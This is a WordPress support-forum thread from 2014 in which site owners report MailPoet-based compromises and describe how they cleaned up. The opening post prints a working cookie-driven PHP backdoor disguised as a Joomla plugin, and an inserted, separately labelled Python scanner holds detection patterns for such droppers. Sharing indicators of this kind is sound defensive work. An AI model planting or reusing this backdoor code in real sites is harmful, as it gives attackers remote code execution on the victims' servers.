Title: Plugin Hacked
Last modified: August 21, 2016

---

# Plugin Hacked

 *  Resolved [webmistress666](https://wordpress.org/support/users/webmistress666/)
 * (@webmistress666)
 * [11 years, 10 months ago](https://wordpress.org/support/topic/plugin-hacked-5/)
 * > 2.6.8 – 2014-07-04
   >  Fixed security issue reported by Dominic
 * Well, I’m hoping this was the culprit, but regardless, our site was compromised
   via Mail Poet last week. There was a backdoor being used to send out massive 
   amounts of spam and our webhost had to shut it down.
 * Files were found in:
    * wp-content/upgrade/
    * wp-content/uploads/ (a file called ajax.php)
    * wp-content/uploads/wysija/themes/main/
    * wp-content/uploads/wysija/themes/main2/
 * These were always .php files, sometimes with a gibberish name, other times with
   a name like “ajax.php” or “index.php” where there shouldn’t have been one (in
   the themes folders).
 * The index.php file inside the “wysija/themes/main/” folders looked like this:
 *     ```
       <?php
       /**
        * @package     Joomla.Plugin.System
        * @since       1.5
        *
        *
        */
       class PlgSysJoomla {
       public function __construct() {
       $file=@$_COOKIE['ljNqe3'];
       if ($file){ $opt=$file(@$_COOKIE['ljNqe2']); $au=$file(@$_COOKIE['ljNqe1']); $opt("/292/e",$au,292); die();} else {phpinfo();die;}}}
       $index=new PlgSysJoomla;
       ```
   
 * Anyway, anyone else have these issues? I updated Mail Poet, deleted all suspicious
   files, changed my FTP password, and am hoping that’s enough.
 * [https://wordpress.org/plugins/wysija-newsletters/](https://wordpress.org/plugins/wysija-newsletters/)
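As an added example (not code from this thread, from MailPoet or from WordPress), here is a small Python scanner built from the indicators the posters describe: PHP files under wp-content/uploads where none belong, a cookie value used as a function name as in the index.php quoted above, and eval() fed by base64 at the top of files. The function names, indicator labels and the sample files are assumptions constructed for this example.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from this thread: any PHP under wp-content/uploads (WordPress never writes
# PHP there), a cookie value invoked as a function, and eval() fed by base64 at a file's top.
INDICATORS = {
    # $x = @$_COOKIE['...']; ... $x(   (the backreference ties assignment to call)
    "cookie_value_called_as_function": re.compile(
        r"\$(\w+)\s*=\s*@?\$_COOKIE\[[^\]]+\]\s*;[\s\S]*?\$\1\s*\("),
    # eval(base64_decode(...)) and the usual decoder variants
    "eval_of_encoded_payload": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
}

def classify(rel_path: str, content: str) -> list:
    """Indicator names matching one file under uploads; an empty list means nothing seen."""
    reasons = ["php_file_in_uploads"] if rel_path.lower().endswith(".php") else []
    return reasons + [name for name, rx in INDICATORS.items() if rx.search(content)]

def scan_uploads(uploads_dir: str) -> dict:
    """Walk wp-content/uploads and map each suspicious relative path to its indicators."""
    root, findings = Path(uploads_dir), {}
    for path in (p for p in root.rglob("*") if p.is_file()):
        with path.open("rb") as fh:                    # first 64 KiB is enough for a dropper
            head = fh.read(65536).decode("utf-8", "replace")
        rel = path.relative_to(root).as_posix()
        reasons = classify(rel, head)
        if reasons:
            findings[rel] = reasons
    return findings

# Constructed fixture (not real malware), shaped like the files reported in the thread.
SAMPLE_FILES = {
    "wysija/themes/main/index.php":
        "<?php $f=@$_COOKIE['c3']; if ($f){ $o=$f(@$_COOKIE['c2']); die(); } else { phpinfo(); }",
    "ajax.php": "<?php echo 'hello';",             # a PHP file where none belongs
    "2014/07/notes.txt": "eval(base64_decode('aGVsbG8='));",
    "2014/07/photo.jpg": "\xff\xd8\xff\xe0 JFIF image data ...",   # benign upload
}

def build_sample_tree() -> str:
    """Write the fixture into a fresh temp dir and return its path."""
    base = Path(tempfile.mkdtemp(prefix="uploads_"))
    for rel, body in SAMPLE_FILES.items():
        (base / rel).parent.mkdir(parents=True, exist_ok=True)
        (base / rel).write_text(body, encoding="utf-8")
    return str(base)
```

Run `scan_uploads("/path/to/wp-content/uploads")` against a real site; anything it returns should be compared with a clean copy of the plugin rather than deleted blindly, since the thread notes legitimate files were also modified in place.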

Viewing 15 replies - 1 through 15 (of 23 total)


 *  [AddyBean](https://wordpress.org/support/users/addybean/)
 * (@addybean)
 * [11 years, 10 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089247)
 * Yes! [http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html](http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html)
 * I’m in the process of backing everything up and plan to wipe out the whole WordPress
   directory and reinstall. I’m not sure if there are added files in there, but 
   many of the existing ones have been modified with an eval and base64 code at
   the top. It looks like it’s managed to get into everything, not just the uploads
   area.
 * What I can’t figure out is if it could have inserted itself into the database
   proper, or if it just modified the WordPress directory. I’m hoping a reinstall
   alone will take care of it. Not sure how to go about checking the database for
   issues. Been through those links that keep getting posted here every time someone
   says they’ve been hacked and still can’t find an answer to the db question.
 *  Thread Starter [webmistress666](https://wordpress.org/support/users/webmistress666/)
 * (@webmistress666)
 * [11 years, 10 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089249)
 * Awesome, thanks for the link! We’ve had our site hacked before, years ago, and
   it was just like you’re describing with the base64 encode. It was a TOTAL NIGHTMARE.
   We ended up just exporting all our content via WordPress to an XML file, wiping
   the installation entirely, installing a new one, and then importing the posts.
 * Luckily, that’s not happening to us currently. I’m hoping we managed to catch
   it in time. There were only about 4 suspicious files and nothing was encoded.
   Still, I’ll be sure to keep an eye out for anything fishy.
 * Good luck with yours.
 *  [dotlizard](https://wordpress.org/support/users/dotlizard/)
 * (@dotlizard)
 * [11 years, 10 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089415)
 * I cleaned the initial infection, but there were backdoors — it roamed all through
   my webserver, with that base64 thing. I spent 8 hours cleaning everything, and
   it’s been clear since. I’m unwilling to do the “export everything then burn it
   with fire” approach just yet, but if it comes back I might have to.
 * I’m kind of bothered that there isn’t more information on this at MailPoet’s 
   site, at least a knowledge base article on the subject. To acknowledge such a
   severe vulnerability as a line item on a changelog seems a bit irresponsible,
   considering they gave hackers console-level access to our servers for four days.
 *  [esmi](https://wordpress.org/support/users/esmi/)
 * (@esmi)
 * [11 years, 10 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089416)
 * What makes you think that the plugin had anything to do with the hack as opposed
   to simply being a victim of it?
 *  Thread Starter [webmistress666](https://wordpress.org/support/users/webmistress666/)
 * (@webmistress666)
 * [11 years, 10 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089417)
 * Did you read the link AddyBean posted?
 * In my case, the first files were uploaded to the wysija/themes directory, which
   is what tipped me off to it being a hole in the plugin. Logs and security fixes
   confirmed.
 *  [aralici](https://wordpress.org/support/users/aralici/)
 * (@aralici)
 * [11 years, 10 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089454)
 * Hi there, all of my sites with MailPoet have been hacked. I’m pretty sure at
   least one of them had the latest version, so for now I have just deleted the plugin.
 *  [aralici](https://wordpress.org/support/users/aralici/)
 * (@aralici)
 * [11 years, 10 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089461)
 * A little update: actually, a file was uploaded to the themes directory on July
   5, BEFORE updating MailPoet, and it was only on the night of Thursday the 17th at
   23:45 (French time) that the flaw was exploited. So the current version may be
   clean, but despite updating the plugin, the flaw may persist because of the infected
   file in wp-content/upload/wysija/themes/*/*.php.
 * Sorry for my bad English.
 *  [kaostik](https://wordpress.org/support/users/kaostik/)
 * (@kaostik)
 * [11 years, 9 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089464)
 * Hi Aral,
   has your problem been solved? I think I have also been infected since the night
   of Thursday to Friday. I am French, sorry for the English translation. Thanks
 *  [aralici](https://wordpress.org/support/users/aralici/)
 * (@aralici)
 * [11 years, 9 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089465)
 * Hi,
 * Yes, problem solved the hard way:
    * reinstalled WP
    * reinstalled all plugins
    * reinstalled theme
    * verified and manually corrected all files not updated in the process (like wp-config.php)
    * verified the database to make sure no “blank” admin user had been created
 * — French 😉 —
 * Yes, problem solved the hard way:
    * Reinstalled WP
    * Reinstalled all plugins
    * Reinstalled the themes
    * Manually checked and corrected all files not updated in the process (like wp-config.php)
    * Checked the database for an admin user created on the sly (I read on a security
      forum that several hackers exploited the flaw, so the attacks can vary from site
      redirection to malware distribution, and up to the creation of backdoors).
 * For the record, two sites I manage had the problem (hosted at OVH; one crashed, the
   other I detected myself once the source of the infection was known), I was asked for
   advice on another one, and finally for an intervention on a fourth (hosted at 1&1,
   whose antivirus detected the problem and set all PHP files to permission 0200).
 * I think there are many, many undetected infected sites lying around… because, as I
   wrote in English above, even if the plugin is up to date, during the time window
   before the flaw was fixed, “backdoor” files were uploaded (all into wp-content/upload,
   apparently).
 * Good luck!
 *  [kaostik](https://wordpress.org/support/users/kaostik/)
 * (@kaostik)
 * [11 years, 9 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089466)
 * Thanks for your answer
   Thanks for your pointers, I had already reinstalled everything once, and was
   reinfected 48h later, with this plugin still active. I have just removed it, along
   with the suspicious files found in upload as well. I am also hesitating to delete
   the plugin’s data from my database. I am now waiting to see whether I get infected
   again. For info, I am at OVH and I had a blank page instead of my site; all my PHP
   files were affected.
 *  [aralici](https://wordpress.org/support/users/aralici/)
 * (@aralici)
 * [11 years, 9 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089467)
 * The plugin is supposed to be clean now, so if you were reinfected when you had
   the latest version, this is probably because of the omission of one of the “backdoor”
   files… or the plugin is not so secure…
 * I don’t think you need to delete data in the database, just check that there is
   no new suspicious user.
 * —
 * Le plugin est sensé être clean maintenant, donc si tu as été réinfecté alors 
   que tu avais la dernière version, c’est sûrement à cause de l’oubli d’un des 
   fichiers “backdoor”… ou alors que le plugin n’est pas sécurisé que ça.
 * Pas besoin de supprimer les données dans la base à priori, mais vérifier qu’il
   n’y a pas eu d’utilisateur suspect ajouté.
 *  [Artemisia1975](https://wordpress.org/support/users/artemisia1975/)
 * (@artemisia1975)
 * [11 years, 9 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089468)
 * My site and that of a friend of mine were infected after the release of the update,
   on July 18. The server blocked my site as malicious and promised to put it back
   online only after deleting the entire site. I have reinstalled WP, reinstalled all
   plugins, reinstalled theme…
 *  [Wysija](https://wordpress.org/support/users/wysija/)
 * (@wysija)
 * [11 years, 9 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089477)
 * Hi guys,
 * We’re really sorry for that.
 * We published a guide on our site which can help you recover your sites:
 * [http://support.mailpoet.com/knowledgebase/site-hacked-what-to-do/](http://support.mailpoet.com/knowledgebase/site-hacked-what-to-do/)
 *  [davydov-denis](https://wordpress.org/support/users/davydov-denis/)
 * (@davydov-denis)
 * [11 years, 9 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089478)
 * There was another hack attack recently; it seems it was not related to MailPoet,
   as some victims did not have it installed:
 *  [http://blog.sucuri.net/2014/07/malware-infection-breaking-wordpress-sites.html](http://blog.sucuri.net/2014/07/malware-infection-breaking-wordpress-sites.html)
 *  [BrooklynBob](https://wordpress.org/support/users/brooklynbob/)
 * (@brooklynbob)
 * [11 years, 9 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089483)
 * My site was hacked **AFTER 2.6.8** was installed, and as a result, my host shut
   my site down this morning (with warning). After speaking with my host’s tech 
   support, I decided that the best thing to do is to “nuke and pave” – wipe my 
   directories, remove the database and start with a clean installation of WordPress,
   my theme and plugins, and hopefully restore my. The other alternative, according
   to them, was to review all of my files and search for malicious code. Unfortunately,
   Mailpoet’s support solution is vague and doesn’t really offer a true solution.
   So, as a result, I’m looking at many hours of work ahead. Thanks a frigging bunch,
   Mailpoet.


The topic ‘Plugin Hacked’ is closed to new replies.


 * 23 replies
 * 14 participants
 * Last reply from: [zifawebsolutions](https://wordpress.org/support/users/zifawebsolutions/)
 * Last activity: [11 years, 4 months ago](https://wordpress.org/support/topic/plugin-hacked-5/page/2/#post-5089522)
 * Status: resolved